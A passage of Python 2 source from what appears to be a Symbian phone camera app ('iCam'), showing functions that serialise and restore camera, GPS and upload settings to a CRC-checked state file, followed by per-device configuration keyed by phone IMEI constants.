state.bin was 0 bytes)
"""
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
try:
if os.path.isfile(pathFileNameBackup):
if myDebugStdout:
print "The state file %s is invalid. We found the " \
"backup of the state file (%s) --> we restore"\
" it as the original state file." % \
(pathFileName, pathFileNameBackup)
sys.stdout.flush()
os.unlink(pathFileName)
MoveFileBetweenAnyDrives(pathFileNameBackup, pathFileName)
# pathFileName = pathFileNameBackup
fInput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
fileData = fileData.decode("zlib")
else:
return False
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return False
stateSize = struct.calcsize(statePackFormat)
(crc32, ) = struct.unpack(statePackFormat28, \
fileData[stateSize - 4 : stateSize])
crtCrc32 = binascii.crc32(fileData[0 : stateSize - 4])
if myDebugStdout:
print "LoadStateFromFile(): crtCrc32 = 0x%X, crc32 = 0x%X" % \
(crtCrc32, crc32)
if (crtCrc32 != crc32) or (crc32 == 0):
if myDebugStdout:
print "LoadStateFromFile(): CRC error: " \
"crtCrc32 = 0x%X, crc32 = 0x%X --> bailing out." % \
(crtCrc32, crc32)
return False
"""
Note: uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer are stored and loaded from
LOCAL_CONFIG_PATH_FILENAME
uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
_, _, _, _, _, uploadHowManyOfLatestBluetoothMessages, _,
startAutomatically, modeManagerIsEnabled, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
_, _, _, _, BATTERY_LEVEL_THRESHOLD, _, internetUploadMaxErrors, _,
uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
startAutomatically, saveUnsentPackets, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
"""
(sizeStateMarshalled,
# IMPORTANT: the first three wildcards represent the
# uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer.
# Altough they are being stored in both the state and config data,
# they are reloaded only from the config file iCam.cfg.
_, _, _, internetUploadMaxErrors, BATTERY_LEVEL_THRESHOLD,
reactiveLoopOpsIndex, sentBTMessageTo6680, _, _,
_, _, # mediaFileSize, ...
uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
startAutomatically, saveUnsentPackets, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG,
accessPointName, _, _, _, _, _, _, # bluetoothSelfAddress in 6 bytes
bluetoothServerAddress, _, # cameraId,
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
_, _, _,
# crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec, numMilliseconds
_, _, _, _,
# int(GetTime()), 0, 0,
stateTime, _, _,
# GetBatteryLevelPercentage(), main_drive_free_space,
# memory_card_free_space, GetFreeRAM(), 0, charger_status,
_, _, _, _, _, _,
# signalUnits, signalStrength,
_, _,
pauseIntervalGdata, pauseInterval,
# burstModeIsStarted, photoResolutionIndex, _, ...
_, photoResolutionIndex, _, localPhotoResolutionIndex[0],
localPhotoResolutionIndex[1], photoModeIndex[0],
# First _ is for opticalZoom
photoModeIndex[1], digitalZoom, _, photoQuality, _,
exposureIndex[0], exposureIndex[1],
whiteBalanceIndex[0], whiteBalanceIndex[1], flashIndex,
startViewfinderBeforeTakingPhoto,
#"", (0, 0, 0, 0, 0, 0, 0, 0,) - Indices for:
# ExposureCompensation, ISO, contrast, sharpness, color tone,
# Scene Modes
_,
#"", #0, 0, 0, 0, 0, 0, 0, 0, - Reserved (ex: ShutterSpeed)
_,
#"", #0, 0, 0, 0, 0, 0, 0, 0, - Indices for
# localVideoMode (VideoFrameRates, VideoEncoding),
# Video Stabilization, Audio Recording, etc
# (Note: Camera app on S60 on N82 has presets: TV High Quality,
# TV Normal Quality, Email High Quality, Email Normal Quality,
# Sharing Quality)
_,
#"", 0, 0, 0, 0, 0, 0, 0, 0, - Reserved (ex: sent videoResolution)
_,
videoRecordDuration[0], videoRecordDuration[1],
localVideoModeIndex[0], localVideoModeIndex[1],
cameraMode[0], cameraMode[1], videoAudioEnabled, _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved
# (ex: audioType - MP3 or AMR)
_,
#"" (0, 0, 0, 0, 0, 0,) - Reserved for other durations
audioRecordDuration, _,
# rotateDegreesImage, "" (0, 0, 0, 0, 0, 0, 0,)
rotateDegreesImage, _,
# mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId,
_, _, _, _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - reserved
_,
#storeLocallyMedia, "", (0, 0, 0, 0, 0, 0, 0)
# Reserved for choose when to send Unsent, plugged and charging
# or not
storeLocallyMedia, _,
# "" (0, 0, 0, 0, 0, 0, 0,) - Reserved for noiseDetectionEnabled,
# faceDetection, soundDetection (a human talking, a dog barking,
# a bird singing)
motionDetectionIsOn, differentPixelsPercentageThreshold[0], _,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for motion detection
# params (thresholds, etc)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved for the result(s)
# returned by the simple detection algorithm(s)
_,
#"" (0, 0, 0, 0, 0, 0, 0, 0,) - Reserved (ex: readGPS)
_,
_, # gpsInfo["position"]["latitude"],
_, # gpsInfo["position"]["longitude"],
_, # gpsInfo["position"]["altitude"],
_, # gpsInfo["position"]["vertical_accuracy"],
_, # gpsInfo["position"]["horizontal_accuracy"],
_, # gpsInfo["course"]["speed"],
_, # gpsInfo["course"]["heading"],
_, # gpsInfo["course"]["heading_accuracy"],
_, # gpsInfo["course"]["speed_accuracy"],
_, # gpsInfo["satellites"]["horizontal_dop"],
_, # gpsInfo["satellites"]["vertical_dop"],
_, # gpsInfo["satellites"]["time_dop"],
_, # gpsInfo["satellites"]["time"],
_, # gpsInfo["satellites"]["used_satellites"],
_, # gpsInfo["satellites"]["satellites"],
_, # 0, 0, 0, 0, 0, 0, 0, 0, - reserved
_, # 0, 0, 0, 0, 0, 0, 0, 0, - reserved
# logAccelerometerAndRotationSensors, "" (0, 0, 0, 0, 0, 0, 0,)
# reserved (ex: light sensor, temperature, humidity,
# body physiology, tap sensor, gyro, etc)
_, _,
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, # 0, 0, 0, 0, 0, 0, 0, 0, reserved for values of these sensors
_, dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], _,
duskTimeVec[0], duskTimeVec[1], duskTimeVec[2], _, #"" (20s), etc
_, _, ICAM_SERVER_NAME, # fileNameStr, ICAM_SERVER_NAME
crc32
) = struct.unpack(statePackFormat,
# Length of string given as arg in unpack() must be calcsize(fmt).
fileData[0 : stateSize])
firstNullCharIndex = accessPointName.find("\x00")
if firstNullCharIndex != -1:
accessPointName = accessPointName[0 : firstNullCharIndex]
# print "len(fileName) =", len(fileName)
accessPointName = unicode(accessPointName)
firstNullCharIndex = bluetoothServerAddress.find("\x00")
if firstNullCharIndex != -1:
bluetoothServerAddress = \
bluetoothServerAddress[0 : firstNullCharIndex]
# print "len(fileName) =", len(fileName)
firstNullCharIndex = ICAM_SERVER_NAME.find("\x00")
if firstNullCharIndex != -1:
ICAM_SERVER_NAME = ICAM_SERVER_NAME[0 : firstNullCharIndex]
global bluetoothMode
if bluetoothServerAddress == "":
bluetoothMode = -1
elif bluetoothServerAddress == "no_BT":
bluetoothMode = 0
bluetoothServerAddress = ""
elif bluetoothServerAddress == "BTServer":
bluetoothMode = 1
bluetoothServerAddress = ""
else:
bluetoothMode = 2
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return False
try:
if myDebugStdout:
print "LoadStateFromFile(): accessPointName = %s, " \
"bluetoothServerAddress = %s, bluetoothMode = %d, " \
"pauseInterval = %d, " \
"cameraMode[0] = %d, cameraMode[1] = %d, " \
"burstModeIsStarted = %d, photoResolutionIndex = %d, " \
"localPhotoResolutionIndex[0] = %d, " \
"localPhotoResolutionIndex[1] = %d" % \
(
accessPointName,
bluetoothServerAddress, bluetoothMode,
pauseInterval,
cameraMode[0], cameraMode[1],
burstModeIsStarted, photoResolutionIndex,
localPhotoResolutionIndex[0],
localPhotoResolutionIndex[1],
)
print "LoadStateFromFile(): " \
"photoModeIndex[0] = %d, photoModeIndex[1] = %d, " \
"digitalZoom = %d, photoQuality = %d, " \
"exposureIndex[0] = %d, exposureIndex[1] = %d, " \
"BATTERY_LEVEL_THRESHOLD = %d." % \
(
photoModeIndex[0], photoModeIndex[1],
digitalZoom, photoQuality,
exposureIndex[0], exposureIndex[1],
BATTERY_LEVEL_THRESHOLD,
)
print "LoadStateFromFile(): " \
"whiteBalanceIndex[0] = %d, whiteBalanceIndex[1] = %d, " \
"flashIndex = %d." % \
(
whiteBalanceIndex[0], whiteBalanceIndex[1],
flashIndex
)
print "LoadStateFromFile(): audioRecordDuration = %d, " \
"videoRecordDuration[0] = %d, videoRecordDuration[1] = %d, " \
"videoAudioEnabled = %d, uploadUnsentData = %d, " \
"storeLocallyMedia = %d, motionDetectionIsOn = %d." % \
(
audioRecordDuration,
videoRecordDuration[0], videoRecordDuration[1],
videoAudioEnabled, uploadUnsentData,
storeLocallyMedia, motionDetectionIsOn,
)
print "LoadStateFromFile(): MY_DEBUG_STDOUT = %d, " \
"MY_DEBUG_STDERR = %d, MY_DEBUG_STDERR_2 = %d, " \
"MY_DEBUG_UPLOAD_MSG = %d." % \
(MY_DEBUG_STDOUT, MY_DEBUG_STDERR,
MY_DEBUG_STDERR_2, MY_DEBUG_UPLOAD_MSG)
print "LoadStateFromFile(): startAutomatically = %d.\n" % \
startAutomatically
sys.stdout.flush()
except:
if myDebugStderr:
traceback.print_exc()
sys.stderr.flush()
return True
return True
NO_MEDIA_FILE_NAME = "[!NO_FILE]"
"""
IMPORTANT: The (local) state does NOT contain the deviceId.
"""
def BuildState(cameraId, crtTime, numMilliseconds, fileName, pathFileName):
global accessPointName, bluetoothMode, bluetoothServerAddress
global signalUnits, signalStrength, pauseInterval, \
burstModeIsStarted, photoResolutionIndex, \
localPhotoResolutionIndex
global photoModeIndex, digitalZoom, photoQuality, exposureIndex, \
whiteBalanceIndex, flashIndex
global audioRecordDuration, videoRecordDuration
global localVideoModeIndex, cameraMode, videoAudioEnabled
global rotateDegreesImage, mobileCountryCode, mobileNetworkCode, \
locationAreaCode, cellId, gpsInfo
global statePackFormat, storeLocallyMedia
global differentPixelsPercentageThreshold
global modeManagerIsEnabled, dawnTimeVec, duskTimeVec
global uploadHowManyOfLatestBluetoothMessages, uploadUnsentData, \
saveUnsentPackets
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global internetUploadMaxErrors
global startAutomatically
global BATTERY_LEVEL_THRESHOLD
global reactiveLoopOpsIndex
#global sentBTMessageTo6680
global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
MY_DEBUG_UPLOAD_MSG
global startViewfinderBeforeTakingPhoto
DebugPrint("Entered BuildState().")
try:
"""
if MY_DEBUG_UPLOAD_MSG:
UploadText("Sending photo saved in %s." % photoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
"""
"""
myText = "Battery = %d. Photo interval (pauseInterval) = %d. " \
"burstModeIsStarted = %d. " \
"Resolution (photoResolutionIndex) = %d. " \
"digitalZoom = %d. photoQuality = %d." \
% (GetBatteryLevelPercentage(), pauseInterval,
burstModeIsStarted,
photoResolutionIndex,
digitalZoom, photoQuality)
"""
"""
UploadText("Battery = %d. Photo interval (pauseInterval) = %d. " \
"burstModeIsStarted = %d. Resolution = %d x %d. " \
"digitalZoom = %d. photoQuality = %d." \
% (GetBatteryLevelPercentage(), pauseInterval,
burstModeIsStarted,
photoResolutionStr[photoResolutionIndex][1][0],
photoResolutionStr[photoResolutionIndex][1][1],
digitalZoom, photoQuality),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
"""
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(photoFileName, ...., ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
ReadGPSPosition()
mediaFileSize = -1
if (fileName is None) or (fileName == NO_MEDIA_FILE_NAME):
#if fileName is None:
fileNameStr = ""
else:
fileNameStr = fileName
try:
mediaFileSize = os.path.getsize(pathFileName)
except:
DebugPrintErrorTrace()
if bluetoothMode == 0:
tmpBluetoothServerAddress = "no_BT"
elif bluetoothMode == 1:
tmpBluetoothServerAddress = "BTServer"
else:
tmpBluetoothServerAddress = bluetoothServerAddress
"""
print "cameraId = %d" % cameraId
print "aYear = %d" % aYear
print "aMonth = %d" % aMonth
print "aDay = %d" % aDay
print "aHour = %d" % aHour
print "aMinute = %d" % aMinute
print "aSecond = %d" % aSecond
print "GetBatteryLevelPercentage() = %d" % GetBatteryLevelPercentage()
print 'GetFreeDriveSpace("E:") = %d' % GetFreeDriveSpace("E:")
print "GetFreeRAM() = %d" % GetFreeRAM()
#signalUnits
print "signalStrength = %d" %signalStrength
print "pauseInterval = %d" % pauseInterval
print "burstModeIsStarted = %d" % burstModeIsStarted
print "photoResolutionIndex = %d" % photoResolutionIndex
print "localPhotoResolutionIndex[0] = %d" % localPhotoResolutionIndex[0]
print "localPhotoResolutionIndex[1] = %d" % localPhotoResolutionIndex[1]
print "photoModeIndex[0] = %d" % photoModeIndex[0]
print "photoModeIndex[1] = %d" % photoModeIndex[1]
print "digitalZoom = %d" % digitalZoom
print "photoQuality = %d" % photoQuality
print "exposureIndex[0] = %d" % exposureIndex[0]
print "exposureIndex[1] = %d" % exposureIndex[1]
print "whiteBalanceIndex[0] = %d" % whiteBalanceIndex[0]
print "whiteBalanceIndex[1] = %d" % whiteBalanceIndex[1]
print "flashIndex = %d" % flashIndex
print "audioRecordDuration = %d" % audioRecordDuration
print "videoRecordDuration[0] = %d" % videoRecordDuration[0]
print "videoRecordDuration[1] = %d" % videoRecordDuration[1]
print "rotateDegreesImage = %d" % rotateDegreesImage
print "mobileCountryCode = %d" % mobileCountryCode
print "mobileNetworkCode = %d" % mobileNetworkCode
print "locationAreaCode = %d" % locationAreaCode
print "cellId = %d" % cellId
print "gpsInfo["position"]["latitude"] = %f" % \
gpsInfo["position"]["latitude"]
print "gpsInfo["position"]["longitude"] = %f" % \
gpsInfo["position"]["longitude"]
print "gpsInfo["position"]["altitude"] = %f" % \
gpsInfo["position"]["altitude"]
print "gpsInfo["position"]["vertical_accuracy"] = %f" % \
gpsInfo["position"]["vertical_accuracy"]
print "gpsInfo["position"]["horizontal_accuracy"] = %f" % \
gpsInfo["position"]["horizontal_accuracy"]
print "gpsInfo["course"]["speed"] = %f" % \
gpsInfo["course"]["speed"]
print "gpsInfo["course"]["heading"] = %f" % \
gpsInfo["course"]["heading"]
print "gpsInfo["course"]["heading_accuracy"] = %f" % \
gpsInfo["course"]["heading_accuracy"]
print "gpsInfo["course"]["speed_accuracy"] = %f" % \
gpsInfo["course"]["speed_accuracy"]
print "gpsInfo["satellites"]["horizontal_dop"] = %f" % \
gpsInfo["satellites"]["horizontal_dop"]
print "gpsInfo["satellites"]["vertical_dop"] = %f" % \
gpsInfo["satellites"]["vertical_dop"]
print "gpsInfo["satellites"]["time_dop"] = %f" % \
gpsInfo["satellites"]["time_dop"]
print "gpsInfo["satellites"]["time"] = %f" % \
gpsInfo["satellites"]["time"]
print "gpsInfo["satellites"]["used_satellites"] = %d" % \
gpsInfo["satellites"]["used_satellites"]
print "gpsInfo["satellites"]["satellites"] = %d" % \
gpsInfo["satellites"]["satellites"]
"""
#DebugPrint("BuildState(): marshalling state.")
stateMarshalled = struct.pack(statePackFormat00,
struct.calcsize(statePackFormat))
#DebugPrint("BuildState(): marshalling state0.")
# IMPORTANT NOTE: b = signed char.
# statePackFormat01 = "<bbbbiiiiibbbbbbbb"
# !!!!I should take out uploadMediaToYouTube, uploadMediaToPicasa,
# useiCamServer from here since I store them in
# LOCAL_CONFIG_PATH_FILENAME and would create some confusion if putting
# them here - there is one reason to put them here: we can inform
# the server what the state is.
stateMarshalled += struct.pack(statePackFormat01,
# IMPORTANT:
# uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer are being
# stored in both the state and config data.
# However, they are reloaded only from the config file iCam.cfg.
uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
internetUploadMaxErrors, BATTERY_LEVEL_THRESHOLD, # !!!!Maybe put it next to the GetBatteryLevelPercentage() field
reactiveLoopOpsIndex, sentBTMessageTo6680, 0, 0, #0, #!!!!Put it closer to startAutomatically
mediaFileSize, 0,
uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
startAutomatically, saveUnsentPackets, uploadUnsentData,
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG)
#DebugPrint("BuildState(): marshalling state1.")
btL = [int(e, 16) for e in bluetoothSelfAddress.split(":")]
stateMarshalled += struct.pack(statePackFormat02,
str(accessPointName),
btL[0], btL[1], btL[2], btL[3], btL[4], btL[5],
str(tmpBluetoothServerAddress),
cameraId)
#DebugPrint("BuildState(): marshalling state2.")
stateMarshalled += struct.pack(statePackFormat03,
crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec,
numMilliseconds)
stateMarshalled += struct.pack(statePackFormat03b, int(GetTime()), 0, 0)
#DebugPrint("BuildState(): marshalling state3.")
#stateMarshalled += struct.pack(statePackFormat04,
# GetBatteryLevelPercentage(), GetFreeDriveSpace("C:"),
# 0, GetFreeDriveSpace("E:"), 0, GetFreeRAM(), 0)
stateMarshalled += struct.pack(statePackFormat04,
GetBatteryLevelPercentage(),
GetFreeDriveSpace("C:"), GetFreeDriveSpace("E:"),
GetFreeRAM(), 0, GetChargerStatus())
#stateMarshalled += struct.pack(statePackFormat04, 0, 0, 0, 0, 0, 0, 0)
#DebugPrint("BuildState(): marshalling state4.")
stateMarshalled += struct.pack(statePackFormat05, signalUnits[:2],
signalStrength)
#DebugPrint("BuildState(): marshalling state5.")
stateMarshalled += struct.pack(statePackFormat06,
pauseIntervalGdata,
pauseInterval, burstModeIsStarted, photoResolutionIndex, 0,
localPhotoResolutionIndex[0], localPhotoResolutionIndex[1],
photoModeIndex[0])
#DebugPrint("BuildState(): marshalling state6.")
# First 0 is for opticalZoom
stateMarshalled += struct.pack(statePackFormat07,
photoModeIndex[1], digitalZoom,
0, photoQuality, 0, exposureIndex[0], exposureIndex[1])
#DebugPrint("BuildState(): marshalling state7.")
stateMarshalled += struct.pack(statePackFormat08,
whiteBalanceIndex[0], whiteBalanceIndex[1],
flashIndex, startViewfinderBeforeTakingPhoto)
#DebugPrint("BuildState(): marshalling state8.")
stateMarshalled += struct.pack(statePackFormat09,
"""
0, 0, 0, 0, 0, 0, 0, 0, - indices for:
ExposureCompensation, ISO, contrast, sharpness, color tone,
Scene Modes
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, - reserved (ex: ShutterSpeed)
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, - indices for
localVideoMode, localVideoFrameRates, localVideoEncoding,
Video Stabilization, Audio Recording, etc
(Note: Camera app on S60 on N82 has presets: TV High Quality,
TV Normal Quality, Email High Quality,
Email Normal Quality, Sharing Quality)
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, #reserved (ex: sent videoResolution)
"""
""
)
#DebugPrint("BuildState(): marshalling state9.")
stateMarshalled += struct.pack(statePackFormat10,
videoRecordDuration[0], videoRecordDuration[1],
int(localVideoModeIndex[0]), int(localVideoModeIndex[1]),
cameraMode[0], cameraMode[1], videoAudioEnabled, 0)
"""
DebugPrint("BuildState(): marshalling state10.")
# 0, 0, 0, 0, 0, 0, 0, 0, - reserved (ex: audioType - MP3 or AMR)
"""
stateMarshalled += struct.pack(statePackFormat11, "")
"""
DebugPrint("BuildState(): marshalling state11.")
# 0, 0, 0, 0, 0, 0, - reserved for other durations
"""
stateMarshalled += struct.pack(statePackFormat12,
audioRecordDuration, "")
"""
DebugPrint("BuildState(): marshalling state12.")
# 0, 0, 0, 0, 0, 0, 0,
"""
stateMarshalled += struct.pack(statePackFormat13,
rotateDegreesImage, "")
#DebugPrint("BuildState(): marshalling state13.")
stateMarshalled += struct.pack(statePackFormat14,
mobileCountryCode, mobileNetworkCode, locationAreaCode,
cellId)
"""
DebugPrint("BuildState(): marshalling state14.")
# 0, 0, 0, 0, 0, 0, 0, 0, - reserved
"""
stateMarshalled += struct.pack(statePackFormat15, "")
"""
DebugPrint("BuildState(): marshalling state15.")
# 0, 0, 0, 0, 0, 0, 0, - reserved for "Choose when to send Unsent",
# plugged and charging or not
"""
stateMarshalled += struct.pack(statePackFormat16,
storeLocallyMedia, "")
"""
DebugPrint("BuildState(): marshalling state16.")
# 0, 0, 0, 0, 0, 0, 0, - reserved for noiseDetectionEnabled,
# faceDetection, soundDetection (a human talking, a dog barking,
# a bird singing)
"""
stateMarshalled += struct.pack(statePackFormat17, motionDetectionIsOn,
differentPixelsPercentageThreshold[0], "")
#DebugPrint("BuildState(): marshalling state17.")
stateMarshalled += struct.pack(statePackFormat18,
"""
0, 0, 0, 0, 0, 0, 0, 0, - reserved for motion detection
params (thresholds, etc)
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, - reserved for the result(s) returned
by the simple detection algorithm(s)
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, - reserved for the result(s) returned
by the simple detection algorithm(s)
"""
"",
"""
0, 0, 0, 0, 0, 0, 0, 0, - reserved for the result(s) returned
by the simple detection algorithm(s)
"""
""
)
"""
DebugPrint("BuildState(): marshalling state18.")
# 0, 0, 0, 0, 0, 0, 0, 0, - reserved (ex: readGPS)
"""
stateMarshalled += struct.pack(statePackFormat19, "")
#DebugPrint("BuildState(): marshalling state19.")
stateMarshalled += struct.pack(statePackFormat20,
gpsInfo["position"]["latitude"],
gpsInfo["position"]["longitude"],
gpsInfo["position"]["altitude"],
gpsInfo["position"]["vertical_accuracy"],
gpsInfo["position"]["horizontal_accuracy"],
gpsInfo["course"]["speed"],
gpsInfo["course"]["heading"],
gpsInfo["course"]["heading_accuracy"],
gpsInfo["course"]["speed_accuracy"],
gpsInfo["satellites"]["horizontal_dop"],
gpsInfo["satellites"]["vertical_dop"],
gpsInfo["satellites"]["time_dop"],
gpsInfo["satellites"]["time"],
gpsInfo["satellites"]["used_satellites"],
gpsInfo["satellites"]["satellites"]
)
#DebugPrint("BuildState(): marshalling state20.")
# 0, 0, 0, 0, 0, 0, 0, 0, #reserved
# 0, 0, 0, 0, 0, 0, 0, 0, #reserved
stateMarshalled += struct.pack(statePackFormat21, "", "")
"""
DebugPrint("BuildState(): marshalling state21.")
# 0, 0, 0, 0, 0, 0, 0, - reserved (ex: light sensor, temperature,
# humidity, body physiology, tap sensor, gyro, etc)
"""
stateMarshalled += struct.pack(statePackFormat22,
logAccelerometerAndRotationSensors, "")
#DebugPrint("BuildState(): marshalling state22.")
stateMarshalled += struct.pack(statePackFormat23,
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
"" # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
)
stateMarshalled += struct.pack(statePackFormat24,
"", # 0, 0, 0, 0, 0, 0, 0, 0 - reserved for values of these sensors
dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], 0,
duskTimeVec[0], duskTimeVec[1], duskTimeVec[2], 0)
stateMarshalled += struct.pack(statePackFormat25, 0)
stateMarshalled += struct.pack(statePackFormat26, fileNameStr)
stateMarshalled += struct.pack(statePackFormat27, ICAM_SERVER_NAME)
crc32 = binascii.crc32(stateMarshalled)
stateMarshalled += struct.pack(statePackFormat28, crc32)
return stateMarshalled
#DebugPrint("BuildState(): marshalled the state.")
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
########################END STATE LOAD/STORE FUNCTIONS#########################
###############################################################################
###############################################################################
############################SETTINGS FOR MY PHONES#############################
# N95 - remarkable moment to have a deffect (wo working display) N95
# as Inet proxy ;)
# INTERNET_PROXY_PHONE_DEVICE_ID = IMEI_N95
# N82
# This is the master in a BT network
INTERNET_PROXY_PHONE_DEVICE_ID = IMEI_N82
INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS = BT_ADDR_N82
# PERSONAL SPECIFIC
if deviceId == IMEI_E7:
# MY_DEBUG_UPLOAD_MSG = False
MY_DEBUG_UPLOAD_MSG = False
#USE_ICAM_SERVER = False
#USE_ICAM_SERVER = True
#ICAM_SERVER_NAME = ICAM_GAE_SERVER_NAME
BATTERY_LEVEL_THRESHOLD = 40
"""
MY_DEBUG_STDOUT = False
MY_DEBUG_STDERR = False
MY_DEBUG_STDERR_2 = False
MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
"""
elif deviceId == IMEI_6120:
LOCAL_FOLDER = "C:/iCam"
if DoesDriveExist("E:"):
LOCAL_FOLDER = "E:/iCam"
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
googleUsername = "googleUser"
BATTERY_LEVEL_THRESHOLD = 60
startButtonPressed = True
saveUnsentPackets = 0 #True
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if not os.path.exists(LOCAL_FOLDER_AUX):
os.makedirs(LOCAL_FOLDER_AUX)
"""
if False:
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = False
# accessPointName = u"RDSPP"
bluetoothMode = 2 # BT client
bluetoothServerAddress = INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS
STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
MY_DEBUG_STDOUT = False
MY_DEBUG_STDERR = False
MY_DEBUG_STDERR_2 = False
MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
elif deviceId == IMEI_N95:
LOCAL_FOLDER = "C:/iCam"
LOCAL_CONFIG_PATH_FILENAME = LOCAL_FOLDER + "/" + LOCAL_CONFIG_FILENAME
LOCAL_FOLDER_SENT_LOGS = LOCAL_FOLDER + "/LogsSent"
# LOCAL_FOLDER = "E:/iCam"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
startButtonPressed = True
#saveUnsentPackets = True
saveUnsentPackets = 0 #True
"""
This instructs phone not to resize photos taken and send them
at original resolution directly.
"""
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = True
# To avoid resize also choose Sent res to (1280, 980)
# LOCAL_FOLDER_AUX = "C:/iCam"
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if not os.path.exists(LOCAL_FOLDER_AUX):
os.makedirs(LOCAL_FOLDER_AUX)
"""
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
cameraMode[0] = 1
cameraMode[1] = 1
videoRecordDuration[0] = 30
videoRecordDuration[1] = 30
"""
# MY_DEBUG_STDOUT = False
MY_DEBUG_STDOUT = True
MY_DEBUG_STDERR = True
